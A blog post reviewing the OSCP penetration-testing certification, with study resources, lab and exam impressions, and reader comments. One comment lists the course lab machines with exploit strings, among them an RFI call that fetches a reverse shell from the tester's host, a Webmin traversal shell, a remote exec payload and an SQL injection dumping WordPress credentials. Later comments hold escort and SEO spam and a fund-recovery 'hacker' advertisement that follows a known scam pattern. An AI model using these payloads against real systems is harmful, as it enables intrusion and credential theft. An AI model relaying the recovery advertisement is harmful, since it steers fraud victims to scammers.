MY OSCP REVIEW
MY OSCP REVIEW
About me
I am just a guy who has done B.E (Computer Engineering), C.E.H and I am doing vulnerability assessment for different clients in Mumbai.Inspiration to do OSCP
Wanted to read technical stuff only then skip this para. Like other guyz I thought that OSCP is one of the most difficult task in the world of IT Security.And yes, it is one the difficult mission you could ever face. Back in Dec 2014 I was really bored with the conventional vulnerability assessment thing, I wanted to do some more exploitation and some black hat stuff. But in our job we were not allowed to do so, as the environment used to be critical most of the time and time for completing the task was less.
So I asked few question on some group in facebook regarding How can I learn more exploitation stuff.
There was a guy with the name Mr.WhiteW0rm who have given me a brilliant answer and recommended me to do OSCP. That time I thought though I won't be able to do OSCP but at least I'll study in its way and work on exploitation as required in OSCP.
Study That I did before OSCP:
I knew that we can use metasploit in the Labs and in Exam. So I started with learning metasploit.Thou I know a bit of it as thought in C.E.H classes, but I need to know more.
There is a friend of mine named Chetan who told me to do metasploit from security tube.
Learning Metasploit
It can be found here http://www.securitytube.net/groups?operation=view&groupId=8
2) Udemy metasploit tutorial given by Mr. Hitesh Choudhary It can be found here https://www.udemy.com/draft/93016/
The above course material is available for Free ;) if u know what I mean.
Learning Python:
I learnt only the first and 3rd module from it. Basically python basics and socket programming is required for bufferoverflow exploitation and OSCP.
2) The book that I referred to practice python program is Violent Python. I did first 4-5 programs from the book.
Learning buffer overflow:
It explain buffer overflow in details.
Secondly I used Exploit research Megaprimer http://www.securitytube.net/groups?operation=view&groupId=7
Lastly I set up my own lab and practiced buffer overflow. I wrote 2 of such buffer overflow exploit on my blog:
http://justpentest.blogspot.in/2015/08/echoserver-strcpy-bufferoverflow.html
http://justpentest.blogspot.in/2015/07/minishare1.4.1-bufferoverflow.html
Learning port forwarding and pivoting:
Practicing on vulnhub.com vm's
I would recommend the following Vm's:
1) Kioptrix series present here https://www.vulnhub.com/series/kioptrix,8/
2) Troll series present here https://www.vulnhub.com/series/tr0ll,49/
3) Pegasus present here https://www.vulnhub.com/entry/pegasus-1,109/
4) Command Injection OS by Security tube https://www.vulnhub.com/entry/command-injection-iso-1,81/ (Try to do this without metasploit, as I've done here http://justpentest.blogspot.in/2015/07/pentester-academy-command-injection-iso-basilic-exploit.html )
The practical exposure I've got from vulnhub.com A big thanks to the guyz who made it.
Post exploitation and privilege escalation:
Some privilege escalation tools that I've used for Linux:
1) Linux priv check www.securitysift.com/download/linuxprivchecker.py
2) LinEnum http://www.rebootuser.com/?p=1758#.VkG1BSvHU1I
Linux exploit suggester can be found here https://github.com/PenturaLabs/Linux_Exploit_Suggester
I guess 90% of the privilege escalation loopholes can be enumerated from the above tool.
Privilege escalation is an art, trust me it troubled me a lot in OSCP labs. Privilege escalation is all about how well you know Linux.
Some privilege escalation tools that I've used for Windows:
1) Windows Exploit suggester https://blog.gdssecurity.com/labs/2014/7/11/introducing-windows-exploit-suggester.html
Some good information regarding Windows privilege escalation can be found in security tube metasploit megaprimer.
My OSCP Lab Review:
I've taken one month Lab time, but I would recommend 2 month lab time is sufficient enough. There are approximately 35+ machine in student network and there are 3 network key that can be found on some of the host in student network. These keys will help you to unlock other Lan segment. Well, I got 2 network key. Lab time is the time that I will never forget in my Life. There were few days, I was really happy because I've compromised my target. But there were many days that I was really upset, disappointed. There was a day I was so frustrated that I thought of quitting it. As they say "TRY HARDER" I took a break tried harder and harder and finally I compromised my target.
I can proudly say I was able to compromise root of one of the toughest machine in the Lab named as "PAIN".
All in all I could say Lab time is a journey it will teach you a lot. In labs you will find variety of Operating system (Linux,Solaris, Windows, Ubuntu, Debian etc), variety of application server (apache, IIS, tomcat, with their different version and flavors) various service and various vulnerability.
There are some pretty famous framework that are used in corporate network but they are vulnerable and can be compromised to get the system.
Admin's of Offsec helps some time, gives disappointing answers sometimes. I could say instead of asking your query to admin, you should concentrate on enumeration and use google. I would recommend "MINIMUM USAGE OF METASPLOIT IN LABS", as this will increase you skill and it is very helpful.
My OSCP Exam review:
There are 5 machine in exam that is supposed to be compromised. There are 3 machine usage of metasploit is allowed but , you can use metasploit on 1 of the 3 machine.
There are few lab machines that are difficult than all the machines in Exam.
The problem with the exam is that you have to compromise 5 machine. Out of which for one machine you have to code a buffer overflow exploit. For other machine you need to do lot of enumeration which is time consuming.
I cleared all 5 machine with its root access in 10 hours.
Finally I got the MAIL ;)
congratulations are in order. I am sure, you have a transparent way out now ;)
ReplyDeleteCongratulations !!! Hope this will motivate me to try this ...thanks for your detailed explanation ...
ReplyDeleteThanks for the write up. btw how to access the metasploit udemy course for free. Like to take the course.
ReplyDeleteHi,
ReplyDeletei would like to know if you had to:-
1 Code for SEH/ Egg Hunters in lab or in Exam? Also Do we need to learn linux buffer overflows ??
2 Is it worth to bruteforce for weak credentials?
Thanks
Amazing article , excellent work brother
ReplyDeleteAmazing article , excellent work brother
ReplyDeleteHi Hashim,
ReplyDeleteCongratulation for your Certification and I am planning to take this exam and I have very basic question is it good to have windows 7 with KaliLinux as VM or Kali Linux it self on laptop..I can have any of these but wanted to know which will help more
Kali in VM is good enough thats what most people do...
DeleteGreat work
ReplyDeleteThanks Hashim for your work and blog posts. I have followed your posts and your guidance regarding OSCP. I am OSCP now. Thanks for your help
ReplyDeleteThis comment has been removed by the author.
ReplyDeleteCongrats Hashim for OSCP and Thanks for sharing the useful links.
ReplyDeleteif you need any help email me a.sharabati@gmail.com
ReplyDeleteby Ahmad Adel Moh. Sharabati
address os_name os_sp purpose name
192.168.13.201 Windows XP client SMB MS08-067
192.168.13.202 Ubuntu Server RFI - priv:Linux Kernel <= 2.6.34-rc3 ReiserFS xattr Privilege Escalation
192.168.13.203 Windows 2000 server WebDav
192.168.13.204 Windows 2000 server WebDav
192.168.13.205 Windows 2000 server pass the hash from 206
192.168.13.206 Windows 2000 server SMB MS08-067
192.168.13.207 Windows XP client
192.168.13.208 Linux 2.4.X server RFI - priv:Linux Kernel <= 2.6.34-rc3 ReiserFS xattr Privilege Escalation
192.168.13.209 OpenSolaris device tomcat - default account
192.168.13.210 Windows 2003 server coldfusion 8
192.168.13.214 Linux 3.X server
192.168.13.215 Linux redhat samba 2.2.7a
192.168.13.216 FreeBSD 7.X device csm php lite admin
192.168.13.218 Windows 2008 server
192.168.13.219 Linux 3.X server
192.168.13.220 Windows 7 client
192.168.13.221 Windows 2008 server
192.168.13.222 ExtremeXOS 12.X device Samba 2.2.3a
192.168.13.223 Windows 2008 server
192.168.13.224 embedded device LFI NIKTO - brute force : bob user bob password
192.168.13.225 Windows 2000 server telnet 192.168.13.225:123 --> MiniShare /windows/remote/616.c
192.168.13.226 Windows 2003 server using metasploit be fast kill python.exe and migrate the process
192.168.13.227 Windows 2000 server SMB MS08-067
192.168.13.229 Windows 2003 server SMB MS08-067
192.168.13.230 NetWare 6.X device
192.168.13.231 Windows 2003 server SMB MS08-067
192.168.13.234 Linux 2.6.X server https://www.exploit-db.com/exploits/15704/
192.168.13.235 Linux 2.6.X server http://192.168.13.235/section.php?page=http://192.168.12.137/reverse_php.txt
192.168.13.236 embedded device
192.168.13.237 Linux 2.6.X server https://www.exploit-db.com/exploits/18650/
192.168.13.238 Linux 3.X server
192.168.13.239 Windows 2008 server ms09_050_smb2_negotiate_func_index
192.168.13.241 Linux 2.6.X server http://192.168.13.241:10000/unauthenticated/..%01/..%01/%01/..%01/..%01/..%01/..%01/..%01//tmp/perl-reverse-shell.cgi
192.168.13.242 Linux 2.6.X server alice user alice
192.168.13.244 Linux 2.6.X server
192.168.13.245 Windows 2008 server ms09_050_smb2_negotiate_func_index
192.168.13.247 Windows 2000 server
192.168.13.249 Android 2.X device FTP Pro
192.168.13.250 Windows Vista client http://192.168.13.250:9505/?search={.exec|C:\Users\Public\Downloads\crypt.exe.}
192.168.13.251 Linux 2.6.X server http://192.168.13.251/wp/wp-content/plugins/wp-forum/feed.php?topic=-4381+union+select+group_concat%28user_login,0x3a,user_pass%29+from+wp_users%23
192.168.13.252 Linux 2.6.X server Time Sheet https://www.exploit-db.com/exploits/1518/
adapazarı eskort
ReplyDeleteadana eskort
aksaray eskort
bartın eskort
yalova eskort
eskort
düzce masöz
manisa masöz
izmit masöz
görükle masöz
Tül perde modelleri
ReplyDeletenumara onay
mobil ödeme bozdurma
nft nasıl alinir
ANKARA EVDEN EVE NAKLÄ°YAT
Trafik sigortası
dedektör
web sitesi kurma
aşk kitapları
Smm Panel
ReplyDeletesmm panel
Ä°s Ä°lanlari Blog
İnstagram takipçi satın al
hirdavatciburada.com
beyazesyateknikservisi.com.tr
servis
tiktok jeton hilesi
Have you been scammed of your money by fake brokers promising you returns on your investment and end up not fulfilling their many promises? Well I was a victim of such an ugly situation, I invested $150,000 in a particular crypto broker that promised me 50% of my investment weekly, it was such a tempting offer and like anyone else I invested in it, and after a week from the day I invested I contacted the broker for my profits and I received no reply, at first I kept my cool but after so many attempts to contact them I lost it, I was so devastated and broken...For weeks I wasn't myself and it had begun to tell on me until I read an online article on how someone like me was able to recover his funds from scammers. I read it carefully and closely and saw the email of the hacker that helped him recover his money from hackers. I contact the hacker and explained everything to him, we discussed everything I wasn't going to make a payment because I wasn't sure of the hacker but he proved his authenticity and helped me recover my money...I was so happy, I never felt happiness like that in my life before...all thanks to Jody Hacklord for a job well done, if you find yourself in a situation like mine contact him at h a c k l o r d j o d y @ g m a i l. c o m or WhatsApp + 1 ( 9 0 8 ) 9 9 1 ‑ 6 6 4 9
ReplyDelete